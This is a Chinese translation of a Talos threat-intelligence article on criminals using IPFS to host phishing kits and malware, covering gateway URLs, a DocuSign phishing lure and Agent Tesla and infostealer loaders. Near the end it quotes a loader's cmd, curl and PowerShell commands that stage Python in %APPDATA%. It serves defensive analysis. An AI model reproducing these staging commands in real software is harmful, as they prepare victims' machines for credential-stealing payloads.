原文地址：https://blog.talosintelligence.com/ipfs-abuse/

翻译：梦幻的彼岸

近年来，新的Web3技术的出现导致互联网上内容的托管和访问方式发生了巨大的变化。这些技术中的许多都集中在规避审查制度和分散对人们经常使用和访问的大部分内容和基础设施的控制。虽然这些技术在各种实际应用中都有合法用途，但它们也为攻击者创造了在网络钓鱼和恶意软件传播活动中利用它们的机会。在过去几年中，Talos观察到越来越多的网络犯罪分子利用诸如InterPlanetary文件系统（IPFS）等技术来促进恶意内容的托管，因为它们提供了相当于 "bulletproof hosting "的功能，并且对试图调节存储在那里的内容具有极强的抵御能力。

InterPlanetary 文件系统（IPFS）是一项Web3技术，旨在实现互联网上资源的分散存储。当内容存储在IPFS网络上时，它被镜像到参与网络的许多系统中，因此，当其中一个系统不可用时，其他系统可以为该内容的请求提供服务。

IPFS存储不同类型的数据，如与NFT相关的图像，用于渲染网页的资源，或可被互联网用户访问的文件。IPFS被设计成对内容审查有弹性，这意味着一旦内容被存储在IPFS网络内，就不可能有效地将其删除。

希望访问存储在IPFS中的内容的用户可以使用一个IPFS客户端，如这里提供的客户端，或者他们可以利用 "IPFS网关"，它有效地位于互联网和IPFS网络之间，允许客户访问网络上的内容。这种功能类似于Tor2web网关提供的访问Tor网络中的内容，而不需要安装客户端。

任何人都可以使用一系列公开可用的工具建立一个IPFS网关。这张截图显示了在互联网上可获得的几个公共IPFS网关：

在IPFS内存储新的内容很简单，而且一旦存在，这些内容就会有弹性，不会被攻陷，这使得它对各种攻击者的吸引力越来越大，可以用来存放钓鱼网页、恶意软件有效载荷和其他恶意内容。

当系统使用IPFS网关访问存储在IPFS网络上的内容时，它们通常依赖于用于访问互联网上其他网站的基于HTTP/HTTPS的相同通信。IPFS网关可以被配置为以几种不同的方式处理传入的请求。在一些实现中，HTTP请求中指定的子域通常被用来定位IPFS网络上的请求资源，如下例所示，这是IPFS网络上托管的Wikipedia的一个镜像副本。该资源的IPFS标识符，或CID，在下面突出显示。

hxxps[:]//bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze[.]ipfs[.]infura-ipfs[.]io

在其他实施方案中，IPFS资源的位置被附加到被请求的URL的末尾，如以下例子所示:

hxxps[:]//ipfs[.]io/ipfs/bafybeiaysi4s6lnjev27ln5icwm6tueaw2vdykrtjkwiphwekaywqhcjze

也有其他使用DNS条目处理请求的方法。不同的IPFS网关的具体实现方式也不同。浏览器甚至已经开始实现对IPFS网络的本地支持，在某些情况下不再需要使用IPFS网关。

IPFS目前被用来托管网络钓鱼工具包，这些网站是网络钓鱼活动通常用来收集和收获毫无戒心的受害者的凭证。在一个例子中，受害者收到了一个声称与DocuSign文件签署服务有关的PDF文件。下面是这样一个PDF的截图：

当受害者点击 "Review Document "链接时，他们会被重定向到一个看起来像是微软认证页面的页面。然而，该页面实际上是在IPFS网络上托管的。

用户会被提示输入一个电子邮件地址和密码。然后，这些信息通过HTTP POST请求被传送到攻击者控制的网络服务器，在那里可以被收集和处理，用于进一步攻击。

在过去的一年里，我们在网络钓鱼活动中观察到了几个类似的例子，因为攻击者认识到了在IPFS网络上托管其网络钓鱼工具包所带来的内容审核挑战。在这个案例中，PDF超链接指向一个IPFS网关，该网关对内容进行审核以保护潜在的受害者，并向试图浏览该链接的受害者显示以下信息

然而，内容仍然存在于IPFS网络中，只需更改用于检索内容的IPFS网关即可确认情况确实如此。

目前有各种威胁行为者在其恶意软件分发活动中利用IPFS等技术。它为恶意的有效载荷提供了低成本的存储，同时提供了对内容节制的弹性，有效地充当了攻击者的 "bulletproof hosting"。同样，使用普通的IPFS网关来访问IPFS网络内托管的恶意内容，与使用恶意域名来检索内容相比，组织更难阻止访问。我们已经观察到目前在野外利用IPFS的各种样本。

在整个2022年，我们观察到野外的样本数量继续增加，因为这成为攻击者更受欢迎的托管方法。下面是一张图表，显示了上传到公共样本库的依赖IPFS的独特样本数量的增加

我们已经观察到正在进行的恶作剧活动在整个感染过程中利用了IPFS，最终检索到了恶意软件的有效载荷。在一个例子中，发给受害者的电子邮件自称是来自土耳其的一家金融机构，并声称与SWIFT支付有关，这是一个常用的国际货币交易系统。

该电子邮件包含一个ZIP附件，其中有一个PE32可执行文件。该可执行文件是用.NET编写的，其功能是为感染链的下一个阶段提供下载器。当执行时，该下载器会接触到一个IPFS网关，以检索一个在IPFS网络中托管的数据块，如下图所示：

该数据包含一个混淆的PE32可执行文件，作为下一阶段的恶意软件有效载荷。下载器从IPFS网关获取数据并将每个字节存储在一个数组中。然后，它使用存储在可执行文件中的一个密钥值，将字节数组转换为下一阶段的PE32。

然后反射性地加载和执行，启动感染过程的下一阶段，在这种情况下，这是一个名为Agent Tesla的远程访问木马（RAT）。

在另一个例子中，我们观察到在几个月的时间里，各种恶意软件有效载荷被上传到公共样本库。我们确定了三个不同的恶意软件集群，它们可能是由同一个威胁者创建的。代码层面的问题表明，许多样本在被上传时正在进行积极的开发，可能是为了测试检测能力。

在所有三个集群中，初始有效载荷的功能是加载器，操作类似，然而，每个集群中IPFS网络上托管的最终有效载荷是不同的。我们观察到的最终有效载荷包括一个基于Python的信息窃取器、可能使用msfvenom生成的反向shell有效载荷，以及一个旨在破坏受害者系统的批处理文件。

所有这些案例中使用的加载器功能相似，有时托管在Discord内容交付网络（CDN）上，这种做法在以前的恶意软件分销商中越来越常见，这里也有描述。所使用的文件名称表明，它们可能是以 "Minecraft "等视频游戏的作弊器和破解器为幌子进行传播的。在大多数情况下，加载器没有被打包，但我们确实观察到使用UPX打包的样本。

当执行时，加载器首先使用以下命令在%APPDATA%内创建一个目录结构:

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft && mkdir Network

然后，该恶意软件试图使用cURL命令从合法的软件供应商那里检索Python 3.10。

这是值得注意的，因为选择直接利用cURL可能会大大减少潜在受害者的数量，因为直到Windows 11才将其作为一个本地命令行工具添加到Windows。用来启动下载的命令行语法如下所示：

C:\Windows\system32\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip

一旦ZIP存档文件被检索，它将被解压缩到先前使用PowerShell“Expand-Archive”cmdlet创建的目录中。

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\Microsoft\Network

恶意软件然后试图检索感染链中的最终有效载荷，将其存储在网络目录中，使用文件名“Packages.txt”。加载器检索Hannabi Grabber的示例如下所示，Hannabi Grabber是用Python编写的信息窃取程序。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课